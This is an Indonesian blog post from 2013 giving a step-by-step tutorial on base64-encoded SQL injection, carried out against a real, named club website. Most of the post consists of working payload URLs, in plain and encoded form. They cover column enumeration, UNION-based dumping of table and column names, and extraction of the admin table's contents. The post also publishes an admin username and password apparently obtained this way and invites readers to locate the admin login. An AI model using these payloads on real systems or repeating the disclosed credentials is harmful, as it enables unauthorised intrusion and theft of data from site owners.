Jumat, 20 Desember 2013

Tutorial Url Base64 Encoded SQL Injection

Posted by Erza Jullian 17.39, under , | No comments

Oke kali ini saya akan share tutorial base64 SQL Injection. Tutorialnya cukup mudah sebenarnya, hanya butuh kesabaran. langsung saja kita mulai.

Bahan-bahan yang diperlukan adalah Browser Mozilla Firefox yang sudah terinstall Hackbar. yang belum punya Hackbar bisa download disini :

Download Hackbar | Mozilla Add ons

Oke langsung ke tutorial.

Target saya kali ini adalah

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTM=

Decode menjadi

http://www.londonfencingclub.co.uk/pictures_detail.php?id=13

Cara decode gimana ? Lihat gambar







 kasih tanda petik satu dibelakang angka menjadi

http://www.londonfencingclub.co.uk/pictures_detail.php?id=13'

Encode dulu pakai Hackbar, jadi

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTMn

Lihat gambar :





Langkah selanjutnya, sama seperti injeksi biasa hanya url diencode seperti diatas.

pakai perintah order by untuk mencari error.

Mulai dari

http://www.londonfencingclub.co.uk/pictures_detail.php?id=13 order by 1--

jangan lupa di encode menjadi :

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTMgb3JkZXIgYnkgMS0t

Lihat gambar :



Hasilnya normal. cari lagi sampai ketemu error.

Langsung cek order by 100



http://www.londonfencingclub.co.uk/pictures_detail.php?id=13 order by 100-- -

Encode pakai hackbar menjadi :

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTMgb3JkZXIgYnkgMTAwLS0gLQ==



Sampai order by 100 ternyata masih normal. Tenang, ada cara baypassnya :D

Tambahkan tanda petik (') setelah angka 13 .

http://www.londonfencingclub.co.uk/pictures_detail.php?id=13' order by 100-- -

Encode menjadi :

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTMnIG9yZGVyIGJ5IDEwMC0tIC0=

Hasilnya , error. No record found :p



Langkah selanjutnya, nyari jumlah column di webnya :D

Langsung order by 10

http://www.londonfencingclub.co.uk/pictures_detail.php?id=13' order by 10-- -

Jangan lupa diencode

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTMnIG9yZGVyIGJ5IDEwLS0gLQ==

Hasilnya normal.



Coba 12

http://www.londonfencingclub.co.uk/pictures_detail.php?id=13' order by 12-- -

Jangan lupa di encode

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTMnIG9yZGVyIGJ5IDEyLS0gLQ==





 Error.



Berarti jumlahnya antara 10-12,

Coba 11.

http://www.londonfencingclub.co.uk/pictures_detail.php?id=13' order by 11-- -

encode

http://www.londonfencingclub.co.uk/pictures_detail.php?id=MTMnIG9yZGVyIGJ5IDExLS0gLQ==





 hasilnya normal.

Berarti jumlah kolomnya ada 11.



Langkah selanjutnya, cari angka ajaib :v

http://www.londonfencingclub.co.uk/pictures_detail.php?id=-13' union select 1,2,3,4,5,6,7,8,9,10,11-- -

Encode dulu kakak

http://www.londonfencingclub.co.uk/pictures_detail.php?id=LTEzJyB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEtLSAt



nah keluar tuh angka maho nya 2 sama 3.

Kita pilih salahsatu untuk melihat table. saya pakai yang 2 aja :p

http://www.londonfencingclub.co.uk/pictures_detail.php?id=-13' union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- -

Encode dulu

http://www.londonfencingclub.co.uk/pictures_detail.php?id=LTEzJyB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyw0LDUsNiw3LDgsOSwxMCwxMSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCktLSAt





 Nah muncul tu nama nama table nya. Pilih yang berhubungan dengan admin yaitu admin_table .

Convert dulu ke bentuk HEX. Di Hackbar udah ada kok.

Klikk menu Encoding - HEX Encoding - String to 00ff00ff

Lihat gambar :



admin_table ketika diconvert menjadi 61646d696e5f7461626c65

Jangan lupa tambahkan 0x didepannya sehingga menjadi 0x61646d696e5f7461626c65

Sekarang waktunya melihat isi dari admin_table

http://www.londonfencingclub.co.uk/pictures_detail.php?id=-13' union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e5f7461626c65 -- -

Encode

http://www.londonfencingclub.co.uk/pictures_detail.php?id=LTEzJyB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMsNCw1LDYsNyw4LDksMTAsMTEgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjE2NDZkNjk2ZTVmNzQ2MTYyNmM2NSAtLSAt





nah keluar tuh nama table nya username sama password .

Tinggal get data :*

Caranya ?

http://www.londonfencingclub.co.uk/pictures_detail.php?id=-13' union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from admin_table-- -

encode dulu

http://www.londonfencingclub.co.uk/pictures_detail.php?id=LTEzJyB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUsMHgzYSxwYXNzd29yZCksMyw0LDUsNiw3LDgsOSwxMCwxMSBmcm9tIGFkbWluX3RhYmxlLS0gLQ==





username = salle

password = moloko



Nah tinggal cari tuh admin loginnya. Cari sendiri :v

Intinya, ya seperti inilah Tutorial Base64 SQL Injection



Sekian tutorial kali ini. Semoga bermanfaat :D

Thanks to Bebyyers404 buat live target nya :)



Copyright 2013 Nabilaholic404 - Madura Cyber



kalo mau copas kasih sumber ya ^_^

0 komentar:

Posting Komentar

Tags

Blog Archive